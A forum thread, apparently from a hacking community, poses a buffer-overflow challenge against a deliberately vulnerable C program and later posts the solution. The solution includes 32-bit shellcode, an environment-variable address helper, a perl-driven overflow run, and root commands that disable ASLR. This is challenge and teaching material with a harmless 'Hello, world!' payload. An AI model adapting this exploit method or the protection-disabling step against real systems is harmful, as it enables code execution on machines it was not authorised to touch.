Second hacking competetion

[Twitch]

Ok, this time round we're going for something a little more advanced.
Using the same code as before (It'll be listed below), you must find a way of making the program print "<handle> was here". It can be done in any way, as long as you don't change the code.
I have done this myself, so I know what to expect from it! Anyway, for those who don't want to click back to the first competition, here's the code again:

Code:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void hidden(){
  printf("Well done!\n");
  exit(0);
}

int main(int argc, char *argv[]){
  char buffer[5];
  if(argc<2){
    printf("Usage: %s <your name>\n",argv[0]);
    exit(0);
  }
  strcpy(buffer, argv[1]);
  printf("Your name is: %s\n",buffer);
  return 0;
}

I expect that not as many people will get this.. I'll give hints this time; You'll need to learn a bit of assembly; buffer overflow; environment variables!
Notes:
I did both of these on a linux box.. Note, however, that Linux is not needed to pass these competitions! I just used it because the live cd that was used had debuggers, etc. For those of you who want this live cd (it's the hacking one - a load of useful tools, compilers, etc) check out the "Ask and ye shall receive" threat.. I posted a torrent there.
I'd say that perl is the only real 'tool' you'd need..

Best of luck folks. I'll post the answer in a week.

[Twitch]

Ok, here's something that may help most of you.. Since the kernel 2.6.12, a countermeasure called ALSR is used to randomize the beginning of the stack. This means, that we have no way of figuring out where our environment variables will be. It makes a lot of the processes involved with this sort of exploiting rather difficult, so here's how to disable it..

Code:

twitch@home:~ $ sudo su -
root@home:~ # echo 0 > /proc/sys/kernel/randomize_va_space
root@home:~ # exit
logout
twitch@home:~ $

With this protection off, the stack no longer begins in random locations. Leave the protection off when you are working on exploitation, challenges, etc, but don't forget to put it back on after you're done :P

UPDATE:
Ok, it's been a week since I posted this, and no ones messaged me their suggestions yet.. So here's the solution!

Code:

; This is the hello3.s program

BITS 32
jmp short one

two: 
  pop ecx
  xor eax,eax
  mov al,4
  xor ebx,ebx
  inc ebx
  xor edx,edx
  mov dl,15
  int 80h

  mov al,1
  dec ebx
  int 80h

one:
  call two
  db "Hello, world!",0x0a,0x0d

That is compiled with
$ nasm hello3.s

PHP Code:

/* This is the getenvaddr.c program */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]){
  char *ptr;
  if(argc<3){
    printf("Usage: %s <environment variable> <target program>\n", argv[0]);
    exit(0);
  }
  ptr = getenv(argv[1]);
  ptr += (strlen(argv[0]) - strlen(argv[2]))*2;
  printf("%s is located at %p\n",argv[1],ptr);
} 


That was compiled with
$ gcc getenvaddr.c -o getenvaddr


And here is how I did it:

Code:

user@home ~/dev $ nasm hello3.s
user@home ~/dev $ hexdump -C hello3 | grep --color=auto 00 
00000000  eb 11 59 b0 04 31 db 43  31 d2 b2 0f cd 80 b0 01  |..Y..1.C1.......|
00000010  4b cd 80 e8 ea ff ff ff  48 65 6c 6c 6f 2c 20 57  |K.......Hello, W|
00000020  6f 72 6c 64 21 0a 0d                              |orld!..|
00000027  
user@home ~/dev $ export SHELLCODE=`cat hello3`
user@home ~/dev $ ./getenvaddr SHELLCODE ./bug
SHELLCODE will be at 0xbffffbdf
user@home ~/dev $ ./bug `perl -e 'print "\xdf\xfb\xff\xbf"x8;'`
□□□□□□□□
Hello, World!
user@home ~/dev $

Just realised the POC I did here didn't have "blah was here", but you get the picture